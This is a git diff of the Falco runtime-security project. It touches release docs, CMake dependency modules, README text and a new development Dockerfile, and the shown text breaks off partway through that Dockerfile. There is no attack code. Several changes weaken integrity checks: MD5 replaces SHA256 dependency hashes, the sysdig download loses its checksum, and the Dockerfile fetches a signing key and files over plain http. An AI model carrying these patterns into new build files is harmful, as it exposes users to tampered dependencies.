-[1]: https://dl.bintray.com/falcosecurity/rpm-dev
-[2]: https://dl.bintray.com/falcosecurity/rpm
-[3]: https://dl.bintray.com/falcosecurity/deb-dev/stable
-[4]: https://dl.bintray.com/falcosecurity/deb/stable
-[5]: https://dl.bintray.com/falcosecurity/bin-dev/x86_64
-[6]: https://dl.bintray.com/falcosecurity/bin/x86_64

RELEASE.md

@@ -1,79 +0,0 @@
-# Falco Release Process
-
-Our release process is mostly automated, but we still need some manual steps to initiate and complete it.
-
-Changes and new features are grouped in [milestones](https://github.com/falcosecurity/falco/milestones), the milestone with the next version represents what is going to be released. 
-
-Releases happen on a monthly cadence, towards the 16th of the on-going month, and we need to assign owners for each (usually we pair a new person with an experienced one). Assignees and the due date are proposed during the [weekly community call](https://github.com/falcosecurity/community). Note that hotfix releases can happen as soon as it is needed.
-
-Finally, on the proposed due date the assignees for the upcoming release proceed with the processes described below.
-
-## Pre-Release Checklist
-
-### 1. Release notes
-- Let `YYYY-MM-DD` the day before of the [latest release](https://github.com/falcosecurity/falco/releases)
-- Check the release note block of every PR matching the `is:pr is:merged closed:>YYY-MM-DD` [filter](https://github.com/falcosecurity/falco/pulls?q=is%3Apr+is%3Amerged+closed%3A%3EYYYY-MM-DD)
-    - Ensure the release note block follows the [commit convention](https://github.com/falcosecurity/falco/blob/master/CONTRIBUTING.md#commit-convention), otherwise fix its content
-    - If the PR has no milestone, assign it to the milestone currently undergoing release
-- Check issues without a milestone (using [is:pr is:merged no:milestone closed:>YYYT-MM-DD](https://github.com/falcosecurity/falco/pulls?q=is%3Apr+is%3Amerged+no%3Amilestone+closed%3A%3EYYYT-MM-DD) filter) and add them to the milestone currently undergoing release
-- Double-check that there are no more merged PRs without the target milestone assigned with the `is:pr is:merged no:milestone closed:>YYYT-MM-DD` [filters](https://github.com/falcosecurity/falco/pulls?q=is%3Apr+is%3Amerged+no%3Amilestone+closed%3A%3EYYYT-MM-DD), if any, fix them
-
-### 2. Milestones
-- Move the [tasks not completed](https://github.com/falcosecurity/falco/pulls?q=is%3Apr+is%3Aopen) to a new minor milestone
-- Close the completed milestone
-    
-### 3. Release PR
-
-- Double-check if any hard-coded version number is present in the code, it should be not present anywhere:
-    - If any, manually correct it then open an issue to automate version number bumping later
-    - Versions table in the `README.md` update itself automatically
-- Generate the change log https://github.com/leodido/rn2md, or https://fs.fntlnz.wtf/falco/milestones-changelog.txt for the lazy people (it updates every 5 minutes) 
-- Add the lastest changes on top the previous `CHANGELOG.md`
-- Submit a PR with the above modifications
-- Await PR approval
-
-## Release
-
-Let `x.y.z` the new version.
-
-### 1. Create a tag
-
-- Once the release PR has got merged, and the CI has done its job on the master, git tag the new release
-
-    ```
-    git pull
-    git checkout master
-    git tag x.y.z
-    git push origin x.y.z
-    ```
-
-> **N.B.**: do NOT use an annotated tag
-
-- Wait for the CI to complete
-
-### 2. Update the GitHub release
-- [Draft a new release](https://github.com/falcosecurity/falco/releases/new)
-- Use `x.y.z` both as tag version and release title
-- Use the following template to fill the release description:
-    ```
-    <!-- Copy the relevant part of the changelog here -->
-
-    ### Statistics
-
-    | Merged PRs        | Number  |
-    |-------------------|---------|
-    | Not user-facing   | x       |
-    | Release note      | x       |
-    | Total             | x       |
-
-    <!-- Calculate stats and fill the above table -->
-    ```
-
-- Finally, publish the release!
-
-## Post-Release tasks
-
-Announce the new release to the world!
-
-- Send an announcement to cncf-falco-dev@lists.cncf.io (plain text, please)
-- Let folks in the slack #falco channel know about a new release came out

brand/README.md

@@ -28,7 +28,7 @@ The CNCF now owns The Falco Project.
 ### What is Runtime Security?
 
 Runtime security refers to an approach to preventing unwanted activity on a computer system. 
-With runtime security, an operator deploys **both** prevention tooling (access control, policy enforcement, etc) along side detection tooling (systems observability, anomaly detection, etc).
+With runtime security an operator deploys **both** prevention tooling (access control, policy enforcement, etc) along side detection tooling (systems observability, anomaly detection, etc).
 Runtime security is the practice of using detection tooling to detect unwanted behavior, such that it can then be prevented using prevention techniques.
 Runtime security is a holistic approach to defense, and useful in scenarios where prevention tooling either was unaware of an exploit or attack vector, or when defective applications are ran in even the most secure environment.
 
@@ -124,9 +124,9 @@ Used to describe the `.ko` object that would be loaded into the kernel as a pote
 This is one option used to pass kernel events up to userspace for Falco to consume.
 Sometimes this word is incorrectly used to refer to a `probe`.
 
-#### Driver 
+#### Driver (deprecated)
 
-The global term for the software that sends events from the kernel. Such as the eBPF `probe` or the `kernel module`.
+An older, more generalized term for a `module` or `probe`. We discourage the use of this word as a project.
 
 #### Falco
 

build/README.md

@@ -1,13 +0,0 @@
-# Build Directory
-
-This is a special directory that is used to compile Falco.
-The flags and their options are defined in `init.sh`.
-Please edit `init.sh` to your liking.
-
-Then build Falco from this directory.
-
-```
-./init.sh
-make all
-```
-

build/init.sh

@@ -1,21 +0,0 @@
-#!/bin/bash
-#
-# Copyright (C) 2019 The Falco Authors.
-#
-# Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with
-# the License. You may obtain a copy of the License at
-#
-# http://www.apache.org/licenses/LICENSE-2.0
-#
-# Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an
-# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the
-# specific language governing permissions and limitations under the License.
-#
-
-cmake ../ \
-      -DBUILD_BPF=OFF \
-      -DBUILD_WARNINGS_AS_ERRORS="OFF" \
-      -DCMAKE_BUILD_TYPE="Release" \
-      -DCMAKE_INSTALL_PREFIX="/usr" \
-      -DFALCO_ETC_DIR="/etc/falco" \
-      -DUSE_BUNDLED_DEPS=OFF

cmake/modules/CPackConfig.cmake

@@ -1,12 +1,9 @@
 set(CPACK_PACKAGE_NAME "${PACKAGE_NAME}")
 set(CPACK_PACKAGE_VENDOR "Cloud Native Computing Foundation (CNCF) cncf.io.")
-set(CPACK_PACKAGE_CONTACT "cncf-falco-dev@lists.cncf.io") # todo: change this once we've got @falco.org addresses
+set(CPACK_PACKAGE_CONTACT "opensource@sysdig.com") # todo: change this once we've got @falco.org addresses
 set(CPACK_PACKAGE_DESCRIPTION_SUMMARY "Falco - Container Native Runtime Security")
 set(CPACK_PACKAGE_DESCRIPTION_FILE "${PROJECT_SOURCE_DIR}/scripts/description.txt")
 set(CPACK_PACKAGE_VERSION "${FALCO_VERSION}")
-set(CPACK_PACKAGE_VERSION_MAJOR "${FALCO_VERSION_MAJOR}")
-set(CPACK_PACKAGE_VERSION_MINOR "${FALCO_VERSION_MINOR}")
-set(CPACK_PACKAGE_VERSION_PATCH "${FALCO_VERSION_PATCH}")
 set(CPACK_PACKAGE_FILE_NAME "${CPACK_PACKAGE_NAME}-${CPACK_PACKAGE_VERSION}-${CMAKE_SYSTEM_PROCESSOR}")
 set(CPACK_PROJECT_CONFIG_FILE "${PROJECT_SOURCE_DIR}/cmake/cpack/CMakeCPackOptions.cmake")
 set(CPACK_STRIP_FILES "ON")
@@ -19,15 +16,15 @@ set(CPACK_DEBIAN_PACKAGE_ARCHITECTURE "amd64")
 set(CPACK_DEBIAN_PACKAGE_HOMEPAGE "https://www.falco.org")
 set(CPACK_DEBIAN_PACKAGE_DEPENDS "dkms (>= 2.1.0.0), libyaml-0-2")
 set(CPACK_DEBIAN_PACKAGE_CONTROL_EXTRA
-    "${CMAKE_BINARY_DIR}/scripts/debian/postinst;${CMAKE_BINARY_DIR}/scripts/debian/prerm;${CMAKE_BINARY_DIR}/scripts/debian/postrm;${PROJECT_SOURCE_DIR}/cmake/cpack/debian/conffiles"
+    "${CMAKE_BINARY_DIR}/scripts/debian/postinst;${CMAKE_BINARY_DIR}/scripts/debian/prerm;${PROJECT_SOURCE_DIR}/scripts/debian/postrm;${PROJECT_SOURCE_DIR}/cmake/cpack/debian/conffiles"
 )
 
 set(CPACK_RPM_PACKAGE_LICENSE "Apache v2.0")
 set(CPACK_RPM_PACKAGE_URL "https://www.falco.org")
 set(CPACK_RPM_PACKAGE_REQUIRES "dkms, kernel-devel, libyaml, ncurses")
-set(CPACK_RPM_POST_INSTALL_SCRIPT_FILE "${CMAKE_BINARY_DIR}/scripts/rpm/postinstall")
-set(CPACK_RPM_PRE_UNINSTALL_SCRIPT_FILE "${CMAKE_BINARY_DIR}/scripts/rpm/preuninstall")
-set(CPACK_RPM_POST_UNINSTALL_SCRIPT_FILE "${CMAKE_BINARY_DIR}/scripts/rpm/postuninstall")
+set(CPACK_RPM_POST_INSTALL_SCRIPT_FILE "${PROJECT_SOURCE_DIR}/scripts/rpm/postinstall")
+set(CPACK_RPM_PRE_UNINSTALL_SCRIPT_FILE "${PROJECT_SOURCE_DIR}/scripts/rpm/preuninstall")
+set(CPACK_RPM_POST_UNINSTALL_SCRIPT_FILE "${PROJECT_SOURCE_DIR}/scripts/rpm/postuninstall")
 set(CPACK_RPM_PACKAGE_VERSION "${FALCO_VERSION}")
 set(CPACK_RPM_EXCLUDE_FROM_AUTO_FILELIST_ADDITION
     /usr/src

cmake/modules/DownloadCatch.cmake

@@ -14,8 +14,8 @@ include(ExternalProject)
 
 set(CATCH2_INCLUDE ${CMAKE_BINARY_DIR}/catch2-prefix/include)
 
-set(CATCH_EXTERNAL_URL URL https://github.com/catchorg/catch2/archive/v2.12.1.tar.gz URL_HASH
-                       SHA256=e5635c082282ea518a8dd7ee89796c8026af8ea9068cd7402fb1615deacd91c3)
+set(CATCH_EXTERNAL_URL URL https://github.com/catchorg/catch2/archive/v2.9.1.tar.gz URL_HASH
+                       MD5=4980778888fed635bf191d8a86f9f89c)
 
 ExternalProject_Add(
   catch2

cmake/modules/DownloadFakeIt.cmake

@@ -15,7 +15,7 @@ include(ExternalProject)
 set(FAKEIT_INCLUDE ${CMAKE_BINARY_DIR}/fakeit-prefix/include)
 
 set(FAKEIT_EXTERNAL_URL URL https://github.com/eranpeer/fakeit/archive/2.0.5.tar.gz URL_HASH
-                        SHA256=298539c773baca6ecbc28914306bba19d1008e098f8adc3ad3bb00e993ecdf15)
+                        MD5=d3d21b909cebaea5b780af5500bf384e)
 
 ExternalProject_Add(
   fakeit-external

cmake/modules/GetFalcoVersion.cmake

@@ -1,5 +1,6 @@
 # Retrieve git ref and commit hash
 include(GetGitRevisionDescription)
+get_git_head_revision(FALCO_REF FALCO_HASH)
 
 # Create the falco version variable according to git index
 if(NOT FALCO_VERSION)
@@ -8,13 +9,25 @@ if(NOT FALCO_VERSION)
   git_get_exact_tag(FALCO_TAG)
   if(NOT FALCO_TAG)
     # Obtain the closest tag
-    git_describe(FALCO_VERSION "--always" "--tags")
+    git_describe(FALCO_VERSION "--abbrev=0" "--tags") # suppress the long format
     # Fallback version
     if(FALCO_VERSION MATCHES "NOTFOUND$")
       set(FALCO_VERSION "0.0.0")
     endif()
-    # Format FALCO_VERSION to be semver with prerelease and build part
-    string(REPLACE "-g" "+" FALCO_VERSION "${FALCO_VERSION}")
+    # TODO(leodido) > Construct the prerelease part (semver 2) Construct the Build metadata part (semver 2)
+    if(NOT FALCO_HASH MATCHES "NOTFOUND$")
+      string(SUBSTRING "${FALCO_HASH}" 0 7 FALCO_VERSION_BUILD)
+      # Check whether there are uncommitted changes or not
+      git_local_changes(FALCO_CHANGES)
+      if(FALCO_CHANGES STREQUAL "DIRTY")
+        string(TOLOWER "${FALCO_CHANGES}" FALCO_CHANGES)
+        set(FALCO_VERSION_BUILD "${FALCO_VERSION_BUILD}.${FALCO_CHANGES}")
+      endif()
+    endif()
+    # Append the build metadata part (semver 2)
+    if(FALCO_VERSION_BUILD)
+      set(FALCO_VERSION "${FALCO_VERSION}+${FALCO_VERSION_BUILD}")
+    endif()
   else()
     # A tag has been found: use it as the Falco version
     set(FALCO_VERSION "${FALCO_TAG}")
@@ -29,8 +42,8 @@ if(NOT FALCO_VERSION)
   string(
     REGEX
     REPLACE
-      "^(0|[1-9][0-9]*)\\.(0|[1-9][0-9]*)\\.(0|[1-9][0-9]*)-((0|[1-9][0-9]*|[0-9]*[a-zA-Z-][0-9a-zA-Z-]*)(\\.(0|[1-9][0-9]*|[0-9]*[a-zA-Z-][0-9a-zA-Z-]*))*).*"
-      "\\5"
+      "^(0|[1-9][0-9]*)\\.(0|[1-9][0-9]*)\\.(0|[1-9][0-9]*)-((0|[1-9][0-9]*|[0-9]*[a-zA-Z-][0-9a-zA-Z-]*)\\.(0|[1-9][0-9]*|[0-9]*[a-zA-Z-][0-9a-zA-Z-]*)*).*"
+      "\\4"
       FALCO_VERSION_PRERELEASE
       "${FALCO_VERSION}")
   if(FALCO_VERSION_PRERELEASE STREQUAL "${FALCO_VERSION}")

cmake/modules/OpenSSL.cmake

@@ -21,7 +21,7 @@ else()
     openssl
     # START CHANGE for CVE-2017-3735, CVE-2017-3731, CVE-2017-3737, CVE-2017-3738, CVE-2017-3736
     URL "https://s3.amazonaws.com/download.draios.com/dependencies/openssl-1.0.2n.tar.gz"
-    URL_HASH "SHA256=370babb75f278c39e0c50e8c4e7493bc0f18db6867478341a832a982fd15a8fe"
+    URL_MD5 "13bdc1b1d1ff39b6fd42a255e74676a4"
     # END CHANGE for CVE-2017-3735, CVE-2017-3731, CVE-2017-3737, CVE-2017-3738, CVE-2017-3736
     CONFIGURE_COMMAND ./config shared --prefix=${OPENSSL_INSTALL_DIR}
     BUILD_COMMAND ${CMD_MAKE}

cmake/modules/cURL.cmake

@@ -32,7 +32,7 @@ else()
     DEPENDS openssl
     # START CHANGE for CVE-2017-8816, CVE-2017-8817, CVE-2017-8818, CVE-2018-1000007
     URL "https://s3.amazonaws.com/download.draios.com/dependencies/curl-7.61.0.tar.bz2"
-    URL_HASH "SHA256=5f6f336921cf5b84de56afbd08dfb70adeef2303751ffb3e570c936c6d656c9c"
+    URL_MD5 "31d0a9f48dc796a7db351898a1e5058a"
     # END CHANGE for CVE-2017-8816, CVE-2017-8817, CVE-2017-8818, CVE-2018-1000007
     CONFIGURE_COMMAND
       ./configure

cmake/modules/gRPC.cmake

@@ -42,15 +42,6 @@ if(NOT USE_BUNDLED_DEPS)
     message(FATAL_ERROR "Couldn't find system protobuf")
   endif()
 
-  # gpr
-  find_library(GPR_LIB NAMES gpr)
-
-  if(GPR_LIB)
-    message(STATUS "Found gpr lib: ${GPR_LIB}")
-  else()
-    message(FATAL_ERROR "Couldn't find system gpr")
-  endif()
-
   # gRPC todo(fntlnz, leodido): check that gRPC version is greater or equal than 1.8.0
   find_path(GRPCXX_INCLUDE NAMES grpc++/grpc++.h)
   if(GRPCXX_INCLUDE)

cmake/modules/jq.cmake

@@ -26,7 +26,7 @@ else()
   ExternalProject_Add(
     jq
     URL "https://github.com/stedolan/jq/releases/download/jq-1.5/jq-1.5.tar.gz"
-    URL_HASH "SHA256=c4d2bfec6436341113419debf479d833692cc5cdab7eb0326b5a4d4fbe9f493c"
+    URL_MD5 "0933532b086bd8b6a41c1b162b1731f9"
     CONFIGURE_COMMAND ./configure --disable-maintainer-mode --enable-all-static --disable-dependency-tracking
     BUILD_COMMAND ${CMD_MAKE} LDFLAGS=-all-static
     BUILD_IN_SOURCE 1

cmake/modules/sysdig-repo/CMakeLists.txt

@@ -15,14 +15,20 @@ cmake_minimum_required(VERSION 3.5.1)
 project(sysdig-repo NONE)
 
 include(ExternalProject)
-message(STATUS "Driver version: ${SYSDIG_VERSION}")
+
+# The sysdig git reference (branch name, commit hash, or tag)
+
+# To update sysdig version for the next release, change the default below
+# In case you want to test against another sysdig version just pass the variable - ie., `cmake -DSYSDIG_VERSION=dev ..`
+if(NOT SYSDIG_VERSION)
+  set(SYSDIG_VERSION "146a431edf95829ac11bfd9c85ba3ef08789bffe")
+endif()
 
 ExternalProject_Add(
   sysdig
   URL "https://github.com/draios/sysdig/archive/${SYSDIG_VERSION}.tar.gz"
-  URL_HASH "${SYSDIG_CHECKSUM}"
+  # URL_HASH SHA256=bd09607aa8beb863db07e695863f7dc543e2d39e7153005759d26a340ff66fa5
   CONFIGURE_COMMAND ""
   BUILD_COMMAND ""
   INSTALL_COMMAND ""
-  TEST_COMMAND ""
-  PATCH_COMMAND patch -p1 -i ${CMAKE_CURRENT_SOURCE_DIR}/patch/libscap.patch)
+  TEST_COMMAND "")

cmake/modules/sysdig-repo/patch/libscap.patch

@@ -1,31 +0,0 @@
-diff --git a/userspace/libscap/scap.c b/userspace/libscap/scap.c
-index e9faea51..a1b3b501 100644
---- a/userspace/libscap/scap.c
-+++ b/userspace/libscap/scap.c
-@@ -52,7 +52,7 @@ limitations under the License.
- //#define NDEBUG
- #include <assert.h>
- 
--static const char *SYSDIG_BPF_PROBE_ENV = "SYSDIG_BPF_PROBE";
-+static const char *SYSDIG_BPF_PROBE_ENV = "FALCO_BPF_PROBE";
- 
- //
- // Probe version string size
-@@ -171,7 +171,7 @@ scap_t* scap_open_live_int(char *error, int32_t *rc,
- 				return NULL;
- 			}
- 
--			snprintf(buf, sizeof(buf), "%s/.sysdig/%s-bpf.o", home, PROBE_NAME);
-+			snprintf(buf, sizeof(buf), "%s/.falco/%s-bpf.o", home, PROBE_NAME);
- 			bpf_probe = buf;
- 		}
- 	}
-@@ -1808,7 +1808,7 @@ int32_t scap_disable_dynamic_snaplen(scap_t* handle)
- 
- const char* scap_get_host_root()
- {
--	char* p = getenv("SYSDIG_HOST_ROOT");
-+	char* p = getenv("HOST_ROOT");
- 	static char env_str[SCAP_MAX_PATH_SIZE + 1];
- 	static bool inited = false;
- 	if (! inited) {

cmake/modules/sysdig.cmake

@@ -21,19 +21,8 @@ if(USE_BUNDLED_DEPS)
 endif()
 
 file(MAKE_DIRECTORY ${SYSDIG_CMAKE_WORKING_DIR})
-
-# The sysdig git reference (branch name, commit hash, or tag)
-# To update sysdig version for the next release, change the default below
-# In case you want to test against another sysdig version just pass the variable - ie., `cmake -DSYSDIG_VERSION=dev ..`
-if(NOT SYSDIG_VERSION)
-  set(SYSDIG_VERSION "47374b2b73734d509f3c99890c80be5242021c3d")
-  set(SYSDIG_CHECKSUM "SHA256=df73b5c69eca8880e30c618dc47b995140286b47fa845c97a3d7a6ddb2d6f1b1")
-endif()
-set(PROBE_VERSION "${SYSDIG_VERSION}")
-
 # cd /path/to/build && cmake /path/to/source
-execute_process(COMMAND "${CMAKE_COMMAND}" -DSYSDIG_VERSION=${SYSDIG_VERSION} -DSYSDIG_CHECKSUM=${SYSDIG_CHECKSUM} ${SYSDIG_CMAKE_SOURCE_DIR} WORKING_DIRECTORY ${SYSDIG_CMAKE_WORKING_DIR})
-
+execute_process(COMMAND "${CMAKE_COMMAND}" ${SYSDIG_CMAKE_SOURCE_DIR} WORKING_DIRECTORY ${SYSDIG_CMAKE_WORKING_DIR})
 
 # todo(leodido, fntlnz) > use the following one when CMake version will be >= 3.13
 

cmake/modules/yaml-cpp.cmake

@@ -26,7 +26,7 @@ else()
   ExternalProject_Add(
     yamlcpp
     URL "https://github.com/jbeder/yaml-cpp/archive/yaml-cpp-0.6.2.tar.gz"
-    URL_HASH "SHA256=e4d8560e163c3d875fd5d9e5542b5fd5bec810febdcba61481fe5fc4e6b1fd05"
+    URL_MD5 "5b943e9af0060d0811148b037449ef82"
     BUILD_IN_SOURCE 1
     INSTALL_COMMAND "")
 endif()

docker/README.md

@@ -1,17 +1,30 @@
 # Falco Dockerfiles
 
-This directory contains various ways to package Falco as a container. 
+This directory contains the various ways to package Falco as a container. 
 
-## Currently Supported Images
+## Currently Supported Containers
 
-| Name | Directory | Description |
-|---|---|---|
-| [falcosecurity/falco:latest](https://hub.docker.com/repository/docker/falcosecurity/falco), [falcosecurity/falco:_tag_](https://hub.docker.com/repository/docker/falcosecurity/falco), [falcosecurity/falco:master](https://hub.docker.com/repository/docker/falcosecurity/falco) | docker/stable | Falco (DEB built from git tag or from the master) with all the building toolchain. | 
-| [falcosecurity/falco:latest-slim](https://hub.docker.com/repository/docker/falcosecurity/falco), [falcosecurity/falco:master-slim](https://hub.docker.com/repository/docker/falcosecurity/falco) | docker/slim | Falco (DEB build from git tag or from the master) without the building toolchain. | 
-| [falcosecurity/falco:latest-minimal](https://hub.docker.com/repository/docker/falcosecurity/falco), [falcosecurity/falco:master-minimal](https://hub.docker.com/repository/docker/falcosecurity/falco) | docker/minimal | Falco (TGZ built from git tag or from the master) without the building toolchain. | 
-| [falcosecurity/falco-builder:latest](https://hub.docker.com/repository/docker/falcosecurity/falco-builder) | docker/builder | The complete build tool chain for compiling Falco from source. See [the documentation](https://falco.org/docs/source/) for more details on building from source. Used to build Falco (CI). | 
-| [falcosecurity/falco-tester:latest](https://hub.docker.com/repository/docker/falcosecurity/falco-tester) | docker/tester | Container image for running the Falco test suite. Used to run Falco integration tests (CI). | 
-| _to not be published_ | docker/local | Built on-the-fly and used by falco-tester. |
+### `falcosecurity/falco` Dockerfiles
+ - `./dev`: Builds a container image from the `dev` apt repo.
+ - `./stable`: Builds a container image from the `stable` apt repo.
+ - `./local`: Builds a container image from a locally provided Falco `dpkg` package.
 
-> Note: `falco-builder`, `falco-tester` (and the `docker/local` image that it's built on the fly) are not integrated into the release process because they are development and CI tools that need to be manually pushed only when updated.
+### Build & Testing Dockerfiles
+ - `./builder`: `falcosecurity/falco-builder` - The complete build tool chain for compiling Falco from source. See [the documentation](https://falco.org/docs/source/) for more details on building from source.
+ - `./tester`: `falcosecurity/falco-tester` - Container image for running the Falco test suite.
+
+## Alpha Release Containers
+
+These Dockerfiles (and resulting container images) are currently in `alpha`. We'd love for you to test these images and [report any feedback](https://github.com/falcosecurity/falco/issues/new/choose).
+
+### Slim and Minimal Dockerfiles
+The goal of these container images is to reduce the size of the underlying Falco container. 
+ - `./slim-dev`: Like `./dev` above but removes build tools for older kernels.
+ - `./slim-stable`: Like `./stable` above but removes build tools for older kernels.
+ - `./minimal`: A minimal container image (~20mb), containing only the files required to run Falco.
+
+### Init Containers
+These container images allow for the delivery of the kernel module or eBPF probe either via HTTP or via a container image.
+ - `kernel/linuxkit`: Multistage Dockerfile to build a Falco kernel module for Linuxkit (Docker Desktop). Generates an alpine based container image with the kernel module, and `insmod` as the container `CMD`.  
+ - `kernel/probeloader`: Multistage Dockerfile to build a Go based application to download (via HTTPS) and load a Falco kernel module. The resulting container image can be ran as an `initContainer` to load the Falco module before Falco starts.
 

docker/builder/Dockerfile

@@ -2,7 +2,7 @@ FROM centos:7
 
 LABEL name="falcosecurity/falco-builder"
 LABEL usage="docker run -v $PWD/..:/source -v $PWD/build:/build falcosecurity/falco-builder cmake"
-LABEL maintainer="cncf-falco-dev@lists.cncf.io"
+LABEL maintainer="opensource@sysdig.com"
 
 ARG BUILD_TYPE=release
 ARG BUILD_DRIVER=OFF

docker/dev/Dockerfile

@@ -0,0 +1,110 @@
+FROM debian:unstable
+
+LABEL maintainer="opensource@sysdig.com"
+
+ENV FALCO_REPOSITORY dev
+
+LABEL RUN="docker run -i -t -v /var/run/docker.sock:/host/var/run/docker.sock -v /dev:/host/dev -v /proc:/host/proc:ro -v /boot:/host/boot:ro -v /lib/modules:/host/lib/modules:ro -v /usr:/host/usr:ro --name NAME IMAGE"
+
+ENV HOST_ROOT /host
+
+ENV HOME /root
+
+RUN cp /etc/skel/.bashrc /root && cp /etc/skel/.profile /root
+
+ADD http://download.draios.com/apt-draios-priority /etc/apt/preferences.d/
+
+RUN apt-get update \
+	&& apt-get install -y --no-install-recommends \
+	bash-completion \
+	bc \
+	clang-7 \
+	ca-certificates \
+	curl \
+	dkms \
+	gnupg2 \
+	gcc \
+	gdb \
+	jq \
+	libc6-dev \
+	libelf-dev \
+	llvm-7 \
+	netcat \
+	xz-utils \
+	&& rm -rf /var/lib/apt/lists/*
+
+# gcc 6 is no longer included in debian unstable, but we need it to
+# build kernel modules on the default debian-based ami used by
+# kops. So grab copies we've saved from debian snapshots with the
+# prefix https://snapshot.debian.org/archive/debian/20170517T033514Z
+# or so.
+
+RUN curl -o cpp-6_6.3.0-18_amd64.deb https://s3.amazonaws.com/download.draios.com/dependencies/gcc-6-debs/cpp-6_6.3.0-18_amd64.deb \
+	&& curl -o gcc-6-base_6.3.0-18_amd64.deb https://s3.amazonaws.com/download.draios.com/dependencies/gcc-6-debs/gcc-6-base_6.3.0-18_amd64.deb \
+	&& curl -o gcc-6_6.3.0-18_amd64.deb https://s3.amazonaws.com/download.draios.com/dependencies/gcc-6-debs/gcc-6_6.3.0-18_amd64.deb \
+	&& curl -o libasan3_6.3.0-18_amd64.deb https://s3.amazonaws.com/download.draios.com/dependencies/gcc-6-debs/libasan3_6.3.0-18_amd64.deb \
+	&& curl -o libcilkrts5_6.3.0-18_amd64.deb https://s3.amazonaws.com/download.draios.com/dependencies/gcc-6-debs/libcilkrts5_6.3.0-18_amd64.deb \
+	&& curl -o libgcc-6-dev_6.3.0-18_amd64.deb https://s3.amazonaws.com/download.draios.com/dependencies/gcc-6-debs/libgcc-6-dev_6.3.0-18_amd64.deb \
+	&& curl -o libubsan0_6.3.0-18_amd64.deb https://s3.amazonaws.com/download.draios.com/dependencies/gcc-6-debs/libubsan0_6.3.0-18_amd64.deb \
+	&& curl -o libmpfr4_3.1.3-2_amd64.deb https://s3.amazonaws.com/download.draios.com/dependencies/gcc-6-debs/libmpfr4_3.1.3-2_amd64.deb \
+	&& curl -o libisl15_0.18-1_amd64.deb https://s3.amazonaws.com/download.draios.com/dependencies/gcc-6-debs/libisl15_0.18-1_amd64.deb \
+	&& dpkg -i cpp-6_6.3.0-18_amd64.deb gcc-6-base_6.3.0-18_amd64.deb gcc-6_6.3.0-18_amd64.deb libasan3_6.3.0-18_amd64.deb libcilkrts5_6.3.0-18_amd64.deb libgcc-6-dev_6.3.0-18_amd64.deb libubsan0_6.3.0-18_amd64.deb libmpfr4_3.1.3-2_amd64.deb libisl15_0.18-1_amd64.deb \
+	&& rm -f cpp-6_6.3.0-18_amd64.deb gcc-6-base_6.3.0-18_amd64.deb gcc-6_6.3.0-18_amd64.deb libasan3_6.3.0-18_amd64.deb libcilkrts5_6.3.0-18_amd64.deb libgcc-6-dev_6.3.0-18_amd64.deb libubsan0_6.3.0-18_amd64.deb libmpfr4_3.1.3-2_amd64.deb libisl15_0.18-1_amd64.deb
+
+# gcc 5 is no longer included in debian unstable, but we need it to
+# build centos kernels, which are 3.x based and explicitly want a gcc
+# version 3, 4, or 5 compiler. So grab copies we've saved from debian
+# snapshots with the prefix https://snapshot.debian.org/archive/debian/20190122T000000Z.
+
+RUN curl -o cpp-5_5.5.0-12_amd64.deb https://s3.amazonaws.com/download.draios.com/dependencies/cpp-5_5.5.0-12_amd64.deb \
+	&& curl -o gcc-5-base_5.5.0-12_amd64.deb https://s3.amazonaws.com/download.draios.com/dependencies/gcc-5-base_5.5.0-12_amd64.deb \
+	&& curl -o gcc-5_5.5.0-12_amd64.deb https://s3.amazonaws.com/download.draios.com/dependencies/gcc-5_5.5.0-12_amd64.deb \
+	&& curl -o libasan2_5.5.0-12_amd64.deb	https://s3.amazonaws.com/download.draios.com/dependencies/libasan2_5.5.0-12_amd64.deb \
+	&& curl -o libgcc-5-dev_5.5.0-12_amd64.deb https://s3.amazonaws.com/download.draios.com/dependencies/libgcc-5-dev_5.5.0-12_amd64.deb \
+	&& curl -o libisl15_0.18-4_amd64.deb https://s3.amazonaws.com/download.draios.com/dependencies/libisl15_0.18-4_amd64.deb \
+	&& curl -o libmpx0_5.5.0-12_amd64.deb https://s3.amazonaws.com/download.draios.com/dependencies/libmpx0_5.5.0-12_amd64.deb \
+	&& dpkg -i cpp-5_5.5.0-12_amd64.deb gcc-5-base_5.5.0-12_amd64.deb gcc-5_5.5.0-12_amd64.deb libasan2_5.5.0-12_amd64.deb libgcc-5-dev_5.5.0-12_amd64.deb libisl15_0.18-4_amd64.deb libmpx0_5.5.0-12_amd64.deb \
+	&& rm -f cpp-5_5.5.0-12_amd64.deb gcc-5-base_5.5.0-12_amd64.deb gcc-5_5.5.0-12_amd64.deb libasan2_5.5.0-12_amd64.deb libgcc-5-dev_5.5.0-12_amd64.deb libisl15_0.18-4_amd64.deb libmpx0_5.5.0-12_amd64.deb
+
+# Since our base Debian image ships with GCC 7 which breaks older kernels, revert the
+# default to gcc-5.
+RUN rm -rf /usr/bin/gcc && ln -s /usr/bin/gcc-5 /usr/bin/gcc
+
+RUN rm -rf /usr/bin/clang \
+	&& rm -rf /usr/bin/llc \
+	&& ln -s /usr/bin/clang-7 /usr/bin/clang \
+	&& ln -s /usr/bin/llc-7 /usr/bin/llc
+
+RUN curl -s https://s3.amazonaws.com/download.draios.com/DRAIOS-GPG-KEY.public | apt-key add - \
+	&& curl -s -o /etc/apt/sources.list.d/draios.list http://download.draios.com/$FALCO_REPOSITORY/deb/draios.list \
+	&& apt-get update \
+	&& apt-get install -y --no-install-recommends falco \
+	&& apt-get clean \
+	&& rm -rf /var/lib/apt/lists/*
+
+# Change the falco config within the container to enable ISO 8601
+# output.
+RUN sed -e 's/time_format_iso_8601: false/time_format_iso_8601: true/' < /etc/falco/falco.yaml > /etc/falco/falco.yaml.new \
+	&& mv /etc/falco/falco.yaml.new /etc/falco/falco.yaml
+
+# Some base images have an empty /lib/modules by default
+# If it's not empty, docker build will fail instead of
+# silently overwriting the existing directory
+RUN rm -df /lib/modules \
+	&& ln -s $HOST_ROOT/lib/modules /lib/modules
+
+# debian:unstable head contains binutils 2.31, which generates
+# binaries that are incompatible with kernels < 4.16. So manually
+# forcibly install binutils 2.30-22 instead.
+RUN curl -s -o binutils_2.30-22_amd64.deb https://s3.amazonaws.com/download.draios.com/dependencies/binutils_2.30-22_amd64.deb \
+	&& curl -s -o libbinutils_2.30-22_amd64.deb https://s3.amazonaws.com/download.draios.com/dependencies/libbinutils_2.30-22_amd64.deb \
